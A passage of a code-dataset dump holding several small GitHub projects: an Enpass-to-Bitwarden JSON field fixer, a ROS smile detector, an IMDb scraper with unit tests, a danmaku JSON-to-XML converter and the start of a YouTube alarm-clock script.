Upload it.\n11. Check the items again. The custom fields should now be correctly hidden when appropriate.\n\n![Bitwarden fixed](https://github.com/jvteleco/Enpass-JSON-to-Bitwarden-converter-fix/blob/master/images/Bitwarden_fields_fixed.jpg?raw=true) \n\n\n**REMEMBER to delete the Fixed_DELETE.txt file once you have finished and move all the JSON files to a secure place since they will have all your passwords.**\n" }, { "alpha_fraction": 0.643216073513031, "alphanum_fraction": 0.6984924674034119, "avg_line_length": 16.583333015441895, "blob_id": "de76fdac325c7180cb1f32688dc2c6e1fe607ec2", "content_id": "dab6cdc0ea19de7c1f83ad16bc97ba1fda2a22d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 199, "license_type": "no_license", "max_line_length": 68, "num_lines": 12, "path": "/Changelog.md", "repo_name": "jvteleco/Enpass-JSON-to-Bitwarden-converter-fix", "src_encoding": "UTF-8", "text": "# Changelog\nAll notable changes to this project will be documented in this file.\n\n\n## [0.0.1] - 2020-04-26\n### Added\n- Created Changelog.md\n- First version of python script\n\n### Changed\n\n### Removed\n" }, { "alpha_fraction": 0.5420600771903992, "alphanum_fraction": 0.5491416454315186, "avg_line_length": 35.12403106689453, "blob_id": "04e488d58b3e3102c97e2c9abcdb41cec19ba7e6", "content_id": "69bef44893d9729916c0603e4d810c5a664bc694", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4660, "license_type": "no_license", "max_line_length": 130, "num_lines": 129, "path": "/EnpassJson_Bitwarden_converter.py", "repo_name": "jvteleco/Enpass-JSON-to-Bitwarden-converter-fix", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\r\n#-----------------------------------------------------------------------\r\n# EnpassJson_Bitwarden_converter.py\r\n# AUTHOR: JVTELECO\r\n# v1.0 26/04/2020\r\n#-----------------------------------------------------------------------\r\n\r\n\"\"\"\r\nThis EnpassJson_Bitwarden_converter.py script allows you to fix the hidden fields of \r\nthe Bitwarden JSON file after importing an Enpass JSON.\r\n\"\"\"\r\n\r\n\r\n\r\nimport traceback\r\nimport json\r\n\r\n\r\nEnpassFileName=\"Enpass_vault.json\"\r\nBitwardenFileName=\"Bitwarden_exported.json\"\r\n\r\nitems_processed = 0\r\nitems_processed_changed = 0\r\n\r\nprint(\"Opening Enpass file\")\r\nwith open(EnpassFileName, encoding=\"utf8\") as f:\r\n    json_data_enpass = json.load(f)\r\n    \r\n##print(json_data) \r\n#print(json.dumps(json_data_enpass, indent = 2))\r\n##print(json.dumps(json_data, indent = 2, sort_keys=True))\r\n\r\nprint(\"Opening Bitwarden file\")\r\nwith open(BitwardenFileName,encoding=\"utf8\") as f_bt:\r\n    json_data_bitwarden = json.load(f_bt)\r\n    \r\n\r\n    \r\nfixed_file= open('Fixed_DELETE.txt', 'w')\r\n    \r\n##print(json_data) \r\n#print(json.dumps(json_data_bitwarden, indent = 2))\r\n##print(json.dumps(json_data, indent = 2, sort_keys=True))\r\n\r\n\r\n\r\n\r\nlong_json_data_enpass_items = len(json_data_enpass[\"items\"])\r\nlong_json_data_bitwarden_items = len(json_data_bitwarden[\"items\"])\r\nprint(\"Enpass number items:\", long_json_data_enpass_items )\r\nprint(\"Bitwarden number items:\", long_json_data_bitwarden_items)\r\n\r\nprint(\"\\n\\n Starting comparison...\\n\\n\")\r\n\r\nfor i in range(0, long_json_data_enpass_items):\r\n\r\n    item_enpass = json_data_enpass[\"items\"][i]\r\n    item_enpass_title = item_enpass[\"title\"]\r\n#    print(\"\\nENPASS:\\t\\t\", item_enpass_title)\r\n    \r\n    for j in range(0, long_json_data_bitwarden_items):\r\n        item_bitwarden = json_data_bitwarden[\"items\"][j]\r\n        item_bitwarden_name = 
item_bitwarden[\"name\"]\n if item_enpass_title == item_bitwarden_name:\n# print(\"Bitwarden:\\t\", item_bitwarden_name)\n #Now check for sensitive items\n #print(json.dumps(item_enpass, indent = 2))\n #print(json.dumps(item_bitwarden, indent = 2))\n \n #we now only the items in the fields that are the custom fields\n try:\n# if (1):\n for k in range(0, len(item_bitwarden[\"fields\"])):\n field_bitwarden=item_bitwarden[\"fields\"][k]\n #print(field_bitwarden)\n \n \n #we now check the name against the Enpass item\n #when there is a match, need to check the sensitive value\n #if it is '1', need to change the bitwarden item type to '1' so it is hidden\n for m in range(0, len(item_enpass[\"fields\"])):\n field_enpass=item_enpass[\"fields\"][m]\n if field_bitwarden[\"name\"] == field_enpass[\"label\"]:\n# print(\"MATCH\")\n# print(field_bitwarden)\n# print(field_enpass)\n #print(type(field_enpass[\"sensitive\"]))\n #print(type(field_bitwarden[\"type\"]))\n if field_enpass[\"sensitive\"] == 1:\n field_bitwarden[\"type\"] = 1\n items_processed_changed = items_processed_changed + 1\n #print(\"CHANGED:\\t\", field_bitwarden)\n fixed_file.write(str(item_bitwarden_name))\n fixed_file.write(\"\\t\")\n fixed_file.write(str(field_bitwarden))\n fixed_file.write(\"\\n\")\n \n \n \n \n \n items_processed=items_processed+1\n #end clause of: if item_enpass_title == item_bitwarden_name:\n except Exception as e:\n #probably if a bitwarden does not have custom fields, will throw an exception of \"fields\" KeyError, does not exist\n ##print(e)\n# print(\"ERROR Bitwarden:\\t\", item_bitwarden_name)\n# print(traceback.format_exc())\n pass\n \n \nprint(\"\\n\\n Finised comparison.\\n\\n\")\n\n\n\nprint(\"Enpass number items:\", long_json_data_enpass_items )\nprint(\"Bitwarden number items:\", long_json_data_bitwarden_items)\nprint(\"Number of items processed with custom fields\", items_processed)\nprint(\"Number of fields fixed to hidden\", items_processed_changed)\n\n\n\n\nwith open('Bitwarden_fixed.json', 'w') as json_file:\n json.dump(json_data_bitwarden, json_file, indent = 2)\n \n \nfixed_file.close()\n" } ]
3
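The core transformation in the converter above is flipping a Bitwarden field's type to 1 (hidden) whenever the matching Enpass field is flagged sensitive. A minimal sketch of just that step, using a label-to-flag lookup instead of the nested field loops; it assumes field labels are unique within an item, which the script also implicitly relies on.

```python
# Minimal sketch: mark a Bitwarden field hidden (type 1) when the matching
# Enpass field is flagged sensitive. Operates on already-parsed dicts.
def fix_hidden_fields(enpass_item, bitwarden_item):
    # label -> sensitive flag for every custom field of the Enpass item
    sensitive = {f["label"]: f.get("sensitive", 0)
                 for f in enpass_item.get("fields", [])}
    fixed = 0
    for field in bitwarden_item.get("fields") or []:
        if sensitive.get(field["name"]) == 1:
            field["type"] = 1  # 1 = hidden in the Bitwarden JSON schema
            fixed += 1
    return fixed

# Example: one sensitive Enpass field, mirrored in the Bitwarden item
enpass = {"fields": [{"label": "PIN", "sensitive": 1}]}
bitwarden = {"fields": [{"name": "PIN", "type": 0, "value": "1234"}]}
print(fix_hidden_fields(enpass, bitwarden), bitwarden)
```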
KhairulIzwan/smile_detection
https://github.com/KhairulIzwan/smile_detection
22ef3e6f6ba76f91d75799832c392cbac3ab82d1
18c0444956473317f48cc6e72e32e4c93488f4f6
b905647d2ddbe9db28d51001bb5906052e528302
refs/heads/master
2022-12-01T13:27:27.944322
2020-08-08T17:15:47
2020-08-08T17:15:47
278,263,042
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6824381947517395, "alphanum_fraction": 0.7009803652763367, "avg_line_length": 26.438596725463867, "blob_id": "b4f359b58ff3ba958a2e604ff5ce94afda9ab0d6", "content_id": "6c069f5db6fd4d9c3552f789ea528a8a229cbc03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4692, "license_type": "no_license", "max_line_length": 79, "num_lines": 171, "path": "/script/smile_detection.py", "repo_name": "KhairulIzwan/smile_detection", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom __future__ import print_function\nfrom __future__ import division\n\n# import the necessary ROS packages\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom sensor_msgs.msg import CameraInfo\n\nimport rospy\n\nimport cv2\n\nfrom cv_bridge import CvBridge\nfrom cv_bridge import CvBridgeError\n\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom tensorflow.keras.models import load_model\n\nimport time\nimport rospkg\nimport os\nimport numpy as np\n\nclass SmileDetector:\n\n\tdef __init__(self):\n\n\t\trospy.logwarn(\"SmileDetector node [ONLINE]\")\n\n\t\tself.bridge = CvBridge()\n\t\tself.rospack = rospkg.RosPack()\n\n\t\tself.image_recieved = False\n\t\tself.face_detected = False\n\n\t\trospy.on_shutdown(self.shutdown)\n\n\t\t## load the face detector cascade and smile detector CNN\n\t\t# Import haarCascade files\n\t\tself.p = os.path.sep.join([self.rospack.get_path('common_face_application')])\n\t\tself.libraryDir = os.path.join(self.p, \"model\")\n\n\t\tself.haar = self.libraryDir + \"/haarcascade_frontalface_default.xml\"\n\n\t\t# Path to input Haar cascade for face detection\n\t\tself.faceCascade = cv2.CascadeClassifier(self.haar)\n\n\t\t# Import model files\n\t\tself.p = os.path.sep.join([self.rospack.get_path('smile_detection')])\n\t\tself.libraryDir = os.path.join(self.p, \"script/model\")\n\n\t\tself.model = self.libraryDir + \"/lenet_smile_detection.hdf5\"\n\n\t\tself.smile = load_model(self.model)\n\n\t\t# Subscribe to Image msg\n\t\timage_topic = \"/cv_camera/image_raw\"\n\t\tself.image_sub = rospy.Subscriber(image_topic, Image, self.cbImage)\n\n\t\t# Subscribe to CameraInfo msg\n\t\tcameraInfo_topic = \"/cv_camera/camera_info\"\n\t\tself.cameraInfo_sub = rospy.Subscriber(cameraInfo_topic, CameraInfo, \n\t\t\tself.cbCameraInfo)\n\n\t\trospy.sleep(1)\n\n\t# Get CameraInfo\n\tdef cbCameraInfo(self, msg):\n\n\t\tself.imgWidth = msg.width\n\t\tself.imgHeight = msg.height\n\n\t# Convert image to OpenCV format\n\tdef cbImage(self, msg):\n\n\t\ttry:\n\t\t\tcv_image = self.bridge.imgmsg_to_cv2(msg, \"bgr8\")\n\n\t\t\t# comment if the image is mirrored\n\t\t\tcv_image = cv2.flip(cv_image, 1)\n\t\texcept CvBridgeError as e:\n\t\t\tprint(e)\n\n\t\tself.image_recieved = True\n\t\tself.image = cv_image\n\n\tdef showImage(self, winName, img):\n\n\t\tcv2.imshow(winName, img)\n\t\tcv2.waitKey(1)\n\n\tdef putInfo(self):\n\n\t\tfontFace = cv2.FONT_HERSHEY_DUPLEX\n\t\tfontScale = 0.4\n\t\tcolor = (255, 255, 255)\n\t\tthickness = 1\n\t\tlineType = cv2.LINE_AA\n\t\tbottomLeftOrigin = False # if True (text upside down)\n\n\t\tself.timestr = time.strftime(\"%Y%m%d-%H:%M:%S\")\n\n\t\tcv2.putText(self.image, \"{}\".format(self.timestr), (10, 15), \n\t\t\tfontFace, fontScale, color, thickness, lineType, \n\t\t\tbottomLeftOrigin)\n\t\tcv2.putText(self.image, \"Sample\", (10, self.imgHeight-10), \n\t\t\tfontFace, fontScale, color, thickness, lineType, \n\t\t\tbottomLeftOrigin)\n\t\tcv2.putText(self.image, \"(%d, 
%d)\" % (self.imgWidth, self.imgHeight), \n\t\t\t(self.imgWidth-100, self.imgHeight-10), fontFace, fontScale, \n\t\t\tcolor, thickness, lineType, bottomLeftOrigin)\n\n\t\t# Clone the original image for displaying purpose later\n\t\tself.frameClone = self.image.copy()\n\n\tdef shutdown(self):\n\t\ttry:\n\t\t\trospy.logwarn(\"SmileDetector node [OFFLINE]\")\n\t\tfinally:\n\t\t\tcv2.destroyAllWindows()\n\n\tdef detectHaarFace(self):\n\n\t\tif self.image_recieved:\n\t\t\t# Detect all faces in the input frame\n\t\t\tself.faceRects = self.faceCascade.detectMultiScale(self.image,\n\t\t\t\tscaleFactor = 1.1, minNeighbors = 5, minSize = (30, 30),\n\t\t\t\tflags = cv2.CASCADE_SCALE_IMAGE)\n\n\t\t\t# Loop over the face bounding boxes\n\t\t\tfor (fX, fY, fW, fH) in self.faceRects:\n\t\t\t\t# Extract the face ROI and update the list of bounding boxes\n\t\t\t\tfaceROI = self.image[fY:fY + fH, fX:fX + fW]\n\n\t\t\t\t# convert it to grayscale\n\t\t\t\tgrayROI = cv2.cvtColor(faceROI, cv2.COLOR_BGR2GRAY)\n\n\t\t\t\t# resize it to a fixed 28x28 pixels, and then prepare the\n\t\t\t\t# ROI for classification via the CNN\n\t\t\t\troi = cv2.resize(grayROI, (28, 28))\n\t\t\t\troi = roi.astype(\"float\") / 255.0\n\t\t\t\troi = img_to_array(roi)\n\t\t\t\troi = np.expand_dims(roi, axis=0)\n\n\t\t\t\t# determine the probabilities of both \"smiling\" and \"not\n\t\t\t\t# smiling\", then set the label accordingly\n\t\t\t\t(notSmiling, smiling) = self.smile.predict(roi)[0]\n\t\t\t\tlabel = \"Smiling\" if smiling > notSmiling else \"Not Smiling\"\n\n\t\t\t\t# display the label and bounding box rectangle on the output\n\t\t\t\t# frame\n\t\t\t\tcv2.putText(self.image, label, (fX, fY - 10),\n\t\t\t\t\tcv2.FONT_HERSHEY_DUPLEX, 0.4, (0, 0, 255), 1)\n\t\t\t\tcv2.rectangle(self.image, (fX, fY), (fX+fW, fY+fH), \n\t\t\t\t\t(0, 255, 0), 2)\n\n\t\t\tself.putInfo()\n\t\t\tself.showImage(\"Haar Face Detector\", self.image)\n\n\nif __name__ == '__main__':\n\n\t# Initializing your ROS Node\n\trospy.init_node('smile_detector', anonymous=False)\n\tface = SmileDetector()\n\n\t# Camera preview\n\twhile not rospy.is_shutdown():\n\t\tface.detectHaarFace()\n" } ]
1
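The ROS node above feeds each detected face through the same few preprocessing steps before calling the smile model. A standalone sketch of that pipeline follows; the random frame is only there so the snippet runs without a camera or ROS.

```python
# Minimal sketch: turn a face ROI into the (1, 28, 28, 1) batch a
# LeNet-style smile classifier consumes.
import cv2
import numpy as np

def preprocess_roi(frame_bgr, box):
    x, y, w, h = box
    roi = frame_bgr[y:y + h, x:x + w]
    roi = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)       # model is single-channel
    roi = cv2.resize(roi, (28, 28)).astype("float") / 255.0
    roi = np.expand_dims(roi, axis=(0, -1))           # add batch and channel axes
    return roi

frame = np.random.randint(0, 255, (480, 640, 3), dtype=np.uint8)
print(preprocess_roi(frame, (100, 100, 120, 120)).shape)  # (1, 28, 28, 1)
```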
Yaambs18/Python_assignment
https://github.com/Yaambs18/Python_assignment
cf1962777aae406a80e34ee361873fe9d43b4450
de0ff4d6d848e46866ce0beb1c290a427cbcf2ad
02b1217bdf34e1c9ffff5029a7717b033b889c2f
refs/heads/main
2023-08-02T11:46:40.128512
2021-09-24T08:23:52
2021-09-24T08:23:52
407,813,476
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.6037272214889526, "alphanum_fraction": 0.6084374189376831, "avg_line_length": 34.649635314941406, "blob_id": "1a5017577a7eacbf4877be6f4e83482abed002d7", "content_id": "aca1341ff0e5ca259d3e7f0b2a4c5db450701b4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4883, "license_type": "no_license", "max_line_length": 110, "num_lines": 137, "path": "/assignment1.py", "repo_name": "Yaambs18/Python_assignment", "src_encoding": "UTF-8", "text": "import requests\nimport bs4\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom string import punctuation\nimport re\nimport csv\nimport os\nimport logging\n\nlogging.basicConfig(filename=\"assignment_file.log\", format='%(asctime)s %(message)s', filemode='w')\nlogger=logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\n# Fetching the Movie ids for top 5 movies\nbase_url = \"https://www.imdb.com/chart/top/\"\n\nmovies_ids = []\nmovies_synopsis = []\ndictionary_movie_data = {}\n\ndef movies_id_func(url):\n \n try:\n request_res = requests.get(url)\n soup = bs4.BeautifulSoup(request_res.text, 'lxml')\n\n for i in range(5):\n movie_id = soup.select(\".titleColumn\")[i]('a')[0]['href'][7:-1]\n movies_ids.append(movie_id)\n return movies_ids\n except requests.exceptions.ConnectionError:\n logging.error(\"Connection Error, Check your Internet connectivity\")\n except requests.exceptions.MissingSchema:\n logging.error(\"Invalid URL\")\n \n# Fetching the synposis for the above movies and storings\n\ndef movies_synopsis_func(movie_id):\n try:\n for i in movie_id:\n request_movie_link = requests.get(f\"https://www.imdb.com/title/{i}\")\n if request_movie_link.status_code == 200:\n format_response = bs4.BeautifulSoup(request_movie_link.text, 'lxml') \n movies_synopsis.append(format_response.select('.ipc-html-content')[1].getText())\n else:\n logging.info(\"Incorrect URL\")\n return movies_synopsis\n except TypeError:\n logging.error(\"None object returned\")\n\n# creating a bag of words of synopsis and addin that in the dictionary with key as film_id\n\ndef bag_of_words(string):\n try:\n stop_words = set(stopwords.words('english'))\n word_tokens = word_tokenize(string)\n filtered_sentence = [word for word in word_tokens if not word.lower() in stop_words]\n bag_of_word = ' '.join(filtered_sentence)\n return bag_of_word\n except TypeError:\n logging.error(\"Missing argument\")\n\n# api data fetching\n\ndef fetch_api_data(movie_ids):\n try:\n for id in movie_ids:\n pattern = r\"\\D{2}\\d{7}\"\n if re.compile(pattern).match(id).group()==id:\n response = requests.get(f\"http://www.omdbapi.com/?i={id}&apikey=1db04143\")\n api_info = response.json()\n try:\n dictionary_movie_data[id]['Genre'] = api_info['Genre']\n dictionary_movie_data[id]['Actors'] = api_info['Actors']\n dictionary_movie_data[id]['Title'] = api_info['Title']\n except KeyError:\n logging.error(\"json file returned None\")\n except TypeError:\n logging.error(\"Missing arguments or Unexpected argument\")\n return dictionary_movie_data\n\nfields = ['movie_id','Title', 'Synopsis', 'Genre', 'Actors']\n# csv file creation\n\ndef write_csv():\n if os.path.exists('movies_data.csv'):\n csvfile = open(\"movies_data.csv\", \"r\")\n reader = csv.DictReader(csvfile)\n for row in reader:\n for item in movies_ids:\n if row['movie_id']==item:\n dictionary_movie_data.pop(item)\n\n csvfile.close()\n if len(dictionary_movie_data)>0:\n with open(\"movies_data.csv\", \"a\") as file:\n writer = csv.DictWriter(file, 
fields)\n for key in dictionary_movie_data:\n writer.writerow({field: dictionary_movie_data[key].get(field) or key for field in fields})\n \n else:\n with open(\"movies_data.csv\", \"w\") as csvfile:\n writer = csv.DictWriter(csvfile, fields)\n writer.writeheader()\n for key in dictionary_movie_data:\n writer.writerow({field: dictionary_movie_data[key].get(field) or key for field in fields})\n\n\ndef fetch_movies_data():\n \n item = input(\"Enter Genre or Actor name for data fetching: \")\n if item and not item.isdigit():\n with open(\"movies_data.csv\", 'r') as file:\n reader = csv.DictReader(file)\n movie_names = []\n for row in reader:\n if item in row['Actors'] or item in row['Genre']:\n movie_names.append(row['Title'])\n return movie_names\n\n\nif __name__ == \"__main__\":\n logging.info(movies_id_func(base_url))\n logging.info(movies_synopsis_func(movies_ids))\n i = 0\n for string in movies_synopsis:\n my_punctuation = punctuation.replace(\"'\", \"\")\n new_str = string.translate(str.maketrans(\"\", \"\", my_punctuation))\n dictionary_movie_data[movies_ids[i]] = {\"Synopsis\" : bag_of_words(new_str)}\n i+=1\n\n logging.info(fetch_api_data(movies_ids))\n write_csv()\n fetched_data = fetch_movies_data()\n print(fetched_data)\n logging.info(fetched_data)" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7407407164573669, "avg_line_length": 16.272727966308594, "blob_id": "bd62fa09f6d3d1aaec2d421f3da7521c704164f3", "content_id": "d56c99479d67169da21666653a67eb4f2efba860", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 189, "license_type": "no_license", "max_line_length": 40, "num_lines": 11, "path": "/Dockerfile", "repo_name": "Yaambs18/Python_assignment", "src_encoding": "UTF-8", "text": "FROM python:3\n\nADD . .\n\nRUN pip install -r requirements.txt\n\nRUN python3 -m nltk.downloader stopwords\nRUN python3 -m nltk.downloader punkt\n\nCMD [ \"assignment1.py\" ]\nENTRYPOINT [ \"python3\" ]" }, { "alpha_fraction": 0.6762749552726746, "alphanum_fraction": 0.6917960047721863, "avg_line_length": 32.44444274902344, "blob_id": "349f0a3ec2b5af6fd9f323f4a1e4a1a4754765ba", "content_id": "13df8b1ec184dfa253ac69fcdd183a8b12ccebe3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 902, "license_type": "no_license", "max_line_length": 160, "num_lines": 27, "path": "/assignment1_unit_test.py", "repo_name": "Yaambs18/Python_assignment", "src_encoding": "UTF-8", "text": "import unittest\nimport assignment1\nimport requests\n\nfrom unittest import mock\nfrom unittest.mock import patch\n\nclass Test_assignment(unittest.TestCase):\n def test_top_movie(self):\n self.assertRaises(TypeError,assignment1.movies_id_func(\"https://www.imdb\"))\n\n def test_api_fetch(self):\n self.assertRaises(TypeError, assignment1.fetch_api_data(123))\n \n def test_synopsis_func(self):\n self.assertRaises(TypeError, assignment1.movies_synopsis_func(123))\n\n def test_bag_of_words(self):\n self.assertEqual(assignment1.bag_of_words('ram is shyam'),'ram shyam')\n\n def test_fetch_data(self):\n with mock.patch('builtins.input', return_value=\"Drama\"):\n assert assignment1.fetch_movies_data() == ['The Shawshank Redemption', 'The Godfather', 'The Godfather: Part II', 'The Dark Knight', '12 Angry Men']\n\n\nif __name__ == \"__main__\":\n unittest.main()" } ]
3
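The stop-word filtering in assignment1.py is the piece most worth isolating. A self-contained sketch, assuming the NLTK stopwords and punkt data are already downloaded (the repo's Dockerfile does exactly that):

```python
# Minimal sketch: reduce a synopsis to its non-stop-word tokens.
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize

def bag_of_words(text):
    stop_words = set(stopwords.words("english"))
    tokens = word_tokenize(text)
    return " ".join(t for t in tokens if t.lower() not in stop_words)

print(bag_of_words("The unanimous Declaration of the thirteen united States"))
# -> "unanimous Declaration thirteen united States"
```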
xmfm/danmaku_json2xml
https://github.com/xmfm/danmaku_json2xml
04b93379b551f4d426d3df92a8c2b9b749560f5e
19df497b11429a9fd56434edf7073303c5cfcb72
9aaf5a4775d6a45a091518e1e48bc037c3d3ee2b
refs/heads/master
2022-11-06T22:37:51.309671
2020-06-13T05:18:24
2020-06-13T05:18:24
271,806,374
7
1
null
null
null
null
null
[ { "alpha_fraction": 0.8093385100364685, "alphanum_fraction": 0.8093385100364685, "avg_line_length": 63.25, "blob_id": "e8f993109ba121c6e7d4cb1202c2d2a1b58d1215", "content_id": "7a4aff48d4ce59bb34fed2319e70ce67f7e59d22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 569, "license_type": "no_license", "max_line_length": 154, "num_lines": 4, "path": "/README.md", "repo_name": "xmfm/danmaku_json2xml", "src_encoding": "UTF-8", "text": "# 简介\n应网友托,编写此脚本,为实现将[此网站](https://matsuri.icu/)所下载的 json 格式的直播弹幕文件转换为 xml 格式的普通哔哩哔哩弹幕文件,可直接在[弹弹Play](http://www.dandanplay.com/) 播放,或转为 ass 文件在普通播放器播放,可重现直播弹幕。\n# 使用方法\n请先在电脑中安装 Python,然后将脚本文件下载到本地,在文件资源管理器中直接将待转换文件拖动到脚本文件上,若转换成功将会在 json 文件所在文件夹中生成同名 xml 文件。\n" }, { "alpha_fraction": 0.5018315315246582, "alphanum_fraction": 0.5311355590820312, "avg_line_length": 29.744186401367188, "blob_id": "5c64290b61112c98da02b3debc375fe923ecf029", "content_id": "5a58db0e039517f5a9aec80037726658a5a64658", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1403, "license_type": "no_license", "max_line_length": 99, "num_lines": 43, "path": "/danmaku_json2xml.py", "repo_name": "xmfm/danmaku_json2xml", "src_encoding": "UTF-8", "text": "import json\r\nimport xml.dom.minidom\r\nimport sys\r\nimport os\r\nimport binascii\r\n\r\n\r\ndef json2xml(json_file):\r\n if json_file[-5:] != '.json':\r\n raise KeyError\r\n xml_file = json_file[0:-4] + 'xml'\r\n with open(json_file, 'r', encoding='utf-8') as f0, open(xml_file, 'w', encoding='utf-8') as f1:\r\n json_txt = f0.read()\r\n json_dict = json.loads(json_txt)\r\n start_time = json_dict['info']['start_time']\r\n danmaku_list = json_dict['full_comments']\r\n\r\n doc = xml.dom.minidom.Document()\r\n root = doc.createElement('i')\r\n doc.appendChild(root)\r\n for danmaku in danmaku_list:\r\n if not danmaku.get('text'): # 跳过礼物\r\n continue\r\n d = doc.createElement('d')\r\n uid_crc32b = hex(binascii.crc32(str(danmaku['user_id']).encode()))[2:]\r\n p = f'{(danmaku[\"time\"]-start_time)/1000},1,25,16777215,' \\\r\n f'{danmaku[\"time\"]//1000},0,{uid_crc32b},{danmaku[\"i\"]}'\r\n d.setAttribute('p', p)\r\n d.appendChild(doc.createTextNode(danmaku['text']))\r\n root.appendChild(d)\r\n doc.writexml(f1)\r\n\r\n\r\nif __name__ == '__main__':\r\n print('正在转换文件:', sys.argv[1], '\\n')\r\n try:\r\n json2xml(sys.argv[1])\r\n except Exception:\r\n print('转换失败\\n')\r\n else:\r\n print('转换成功\\n')\r\n\r\n os.system('pause')\r\n" } ]
2
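The dense part of the converter above is the `p` attribute written on each `<d>` element. A sketch of just that computation with a made-up comment record; the field order (offset seconds, mode, size, color, send timestamp, pool, sender hash, row id) follows the common Bilibili XML layout the script targets.

```python
# Minimal sketch: build the Bilibili-style "p" attribute for one danmaku.
import binascii

def p_attr(comment, start_time_ms):
    # Sender hash: hex of crc32 over the stringified user id, without "0x".
    uid_hash = hex(binascii.crc32(str(comment["user_id"]).encode()))[2:]
    return (f'{(comment["time"] - start_time_ms) / 1000},1,25,16777215,'
            f'{comment["time"] // 1000},0,{uid_hash},{comment["i"]}')

demo = {"time": 1_591_000_123_456, "user_id": 42, "i": 7}
print(p_attr(demo, 1_591_000_000_000))
# -> "123.456,1,25,16777215,1591000123,0,<hash>,7"
```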
jsmith716/AlarmClock
https://github.com/jsmith716/AlarmClock
03dc0a99f20e7604b5549d4d0c9236cdc3097973
487727de27e5473973776233bd4d011656871ad7
57944dd561bb4f3b69f51a705a6493049828ee77
refs/heads/master
2021-01-12T13:27:38.398061
2017-09-24T12:17:21
2017-09-24T12:17:21
69,833,082
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6420428156852722, "alphanum_fraction": 0.6648446321487427, "avg_line_length": 40.85620880126953, "blob_id": "fee23fe8599640737213a035e15d97eeb5e0cfcc", "content_id": "b0a65aff7128bd6640087a8736cc34d4ee3283f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6403, "license_type": "no_license", "max_line_length": 176, "num_lines": 153, "path": "/AlarmClock.py", "repo_name": "jsmith716/AlarmClock", "src_encoding": "UTF-8", "text": "'''\nThis is just practice stuff.\n\nAlarm clock that plays either the top trending YouTube video or a random video \nfrom a local file named videolist.txt. The decision as to which to play is based \non user input when script is run.\nThe alarm clock does not terminate once the alarm triggers. Instead, it starts \nover so it will play a video daily until the user manually kills the script.\n\nRequirement: \n-Chrome or Firefox\n-A file named videolist.txt in same directory of script that looks something like this: \nhttps://www.youtube.com/watch?v=6NhzaWuG2wg\nhttps://www.youtube.com/watch?v=yW_oZR9a714\nhttps://www.youtube.com/watch?v=PKehlbkbO3Q\n\nThis has been tested in Python 2.7 and 3.4\n'''\nimport argparse\nimport time\nimport datetime\nimport random\nimport requests\nimport json\nimport sys\nfrom selenium import webdriver\n\n\nparser = argparse.ArgumentParser(description='Alarm Clock')\n\nparser.add_argument('-time', action=\"store\", dest=\"wake_time\", default=\"7:00 AM\", required=True,\n help=\"The time you want to wake up. Available formats are 7:00PM, '7:00 PM', 19:00 or 1900. If you use a space, you must put time in quotes - '7:00 PM' \")\n\nparser.add_argument('-type', action=\"store\", dest=\"video_type\", default=\"top\", required=False,\n help=\"Available inputs are top or random. Top will pull top trending video. Random will pull from a local videolist.txt file.\")\n\nparser.add_argument('-browser', action=\"store\", dest=\"video_browser\", default=\"Chrome\", required=False,\n help=\"Specify the browser you have on your machine. Options are Firefox or Chrome. The default is chrome.\")\n\nresults = parser.parse_args() \n\n# Turns users input into a workable time format\ndef process_time_from_user(wake_time):\n try: \n return time.strftime(\"%H%M\", time.strptime(wake_time, \"%I%M%p\")) # Looks for 12 hour format - e.g. 700PM\n except:\n pass\n try: \n return time.strftime(\"%H%M\", time.strptime(wake_time, \"%H%M\")) # Looks for 24 hour format - e.g. 1900\n except:\n print (\"\\nI did not understand the time you entered. \\nPlease enter in these formats: \\n\\n\\t 7:00AM \\n\\t '7:00 AM' \\n\\t 2100 \\n\\t 21:00\\n\\n\")\n raise # Added this to exit out of the script. https://docs.python.org/2/tutorial/errors.html#user-defined-exceptions\n\n\n# Selects random video from file videolist.txt. Re-opens file every time in the event that you want to change videos in videolist.txt without exiting the script \ndef play_local_video():\n video_list = list()\n with open('videolist.txt', 'r') as f:\n for lines in f:\n video_list.append(lines)\n \n play_video(random.choice(video_list), 60) # Sets the video to play for 60 seconds\n\n\n# Gets yesterdays top YouTube trending YouTube video. 
\n# We could use this to dump all the videos to a file for later use \n# THIS DOESN\"T WORK ANYMORE - NEED TO TRANSITION TO API!!!\ndef play_top_video():\n # Sets date to two days ago since I'm not sure how soon the previous days videos are available\n dates = (datetime.date.today() - datetime.timedelta(2)).strftime(\"%Y%m%d\")\n\n # Used http://curl.trillworks.com to convert curl command pulled from chrome's dev tools\n headers = {\n 'Origin': 'http://www.google.com',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36',\n 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',\n 'Accept': '*/*',\n 'Referer': 'http://www.google.com/trends/hotvideos',\n 'Proxy-Connection': 'keep-alive'\n }\n\n data = \"hvd=\"+dates+\"&geo=US&mob=0&hvsm=0\"\n\n req = requests.post('https://www.google.com/trends/hotvideos/hotItems', headers=headers, data=data)\n\n mydic = 